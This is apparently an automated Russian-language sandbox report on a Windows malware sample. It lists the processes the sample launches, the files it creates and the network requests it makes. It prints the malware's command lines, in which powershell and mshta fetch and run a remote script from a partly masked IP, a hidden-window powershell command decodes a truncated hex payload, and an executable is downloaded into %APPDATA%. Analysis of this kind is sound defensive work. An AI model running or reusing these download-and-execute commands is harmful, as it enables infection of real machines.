Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' mshta http://14#.#1.230.198:5566/config
- '<SYSTEM32>\mshta.exe' http://14#.#1.230.198:5566/config
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -ep Unrestricted -nop function ZNhAkCsD($VcqyU){return -split ($VcqyU -replace '..', '0x$& ')};$hnDPyfA = ZNhAkCsD('877F3552A34EB6E0809DDD1583DD01525D8D3534759E8863263549F354CFCEAC44A758A5...
- '<SYSTEM32>\notepad.exe' %APPDATA%\config.txt
- '%APPDATA%\king_0x0001571acdbab503.exe'
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\config.txt
- %APPDATA%\king_0x0001571acdbab503.exe
Сетевая активность
Подключается к
- '14#.#1.230.198':5566
TCP
Запросы HTTP GET
- http://14#.##.230.198:5566/config via 14#.#1.230.198
- http://14#.##.230.198:5566/config.txt via 14#.#1.230.198
- http://14#.##.230.198:5566/king_0x0001571ACDBAB503.exe via 14#.#1.230.198
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -ep Unrestricted -nop function ZNhAkCsD($VcqyU){return -split ($VcqyU -replace '..', '0x$& ')};$hnDPyfA = ZNhAkCsD('877F3552A34EB6E0809DDD1583DD01525D8D3534759E8863263549F354CFCEAC44A758A5... (со скрытым окном)
